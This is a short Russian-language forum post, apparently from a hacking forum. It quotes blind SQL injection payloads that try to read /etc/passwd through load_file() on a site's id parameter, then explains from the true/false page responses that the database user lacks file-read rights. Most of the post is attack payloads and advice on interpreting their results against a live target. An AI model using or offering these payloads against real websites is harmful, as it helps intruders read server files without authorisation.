11.08.2015, 16:32
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от 3nvY
↑
При таком запросе: AND 1=if(load_file(unhex(hex('/etc/passwd')))
is NULL
,1,2)--+ отображается как и при site.ru/index.php?id=1
а при AND 1=if(load_file(unhex(hex('/etc/passwd')))
is not NULL
,1,2)--+ пустая страница.
and 1=1 TRUE
and 1=2 FALSE
Соответственно, load_file(unhex(hex('/etc/passwd')) возвращает null, у вас нет прав на чтение.
|
|
|